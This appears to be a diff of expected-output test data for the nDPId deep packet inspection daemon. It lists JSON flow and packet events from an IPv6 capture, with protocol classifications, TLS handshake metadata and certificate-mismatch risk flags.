+00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1448269145478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269145478,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBIqAA1AAAEAA3qswP\/+pw1MAbvpKty9dyV2npjUgBAA8BoIAAABAQgK494IbhIM+eU="} +00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269146905,"flow_last_seen":1448269146905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269146905,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1448269146905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146905,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z4wBuwtKuykAAAAAoAJwgNR+AAACBAWgBAIIChINf0kAAAAAAQMDBw=="} 
+00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269146905,"flow_last_seen":1448269146905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269146905,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1448269146905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146905,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z44Bu8SPrfMAAAAAoAJwgNR+AAACBAWgBAIIChINf0kAAAAAAQMDBw=="} +00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146912,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOyoCJvAArQGXAAAAAAAAAjYqAA1AAAEAA3qswP\/+pw1MAbvPjun6mTbEj630oBJswJfaAAACBAV8BAIIChvn+wESDX9JAQMDBQ=="} 
+00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z44Bu8SPrfTp+pk3gBAA4dR2AAABAQgKEg1\/Sxvn+wE="} +00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146912,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOyoCJvAArQGXAAAAAAAAAjYqAA1AAAEAA3qswP\/+pw1MAbvPjOjBmT8LSrsqoBJswEUcAAACBAV8BAIIChvn+wESDX9JAQMDBQ=="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z4wBuwtKuyrowZlAgBAA4dR2AAABAQgKEg1\/Sxvn+wE="} 
+00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} 
+01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":628,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}} +00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3080,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":471,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}} 
+00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1448269146905,"flow_last_seen":1448269146970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1448269146905,"flow_last_seen":1448269146966,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
+00673{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1448269127395,"flow_last_seen":1448269127510,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":506,"flow_tot_l4_payload_len":1009,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1448269127395,"flow_last_seen":1448269127510,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":506,"flow_tot_l4_payload_len":1009,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1448269127400,"flow_last_seen":1448269138520,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":12133,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
-00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} -00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1448269139219,"flow_last_seen":1448269139339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
-00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1448269144450,"flow_last_seen":1448269144884,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":13365,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} -00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269143410,"flow_last_seen":1448269143539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00622{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269143410,"flow_last_seen":1448269143539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
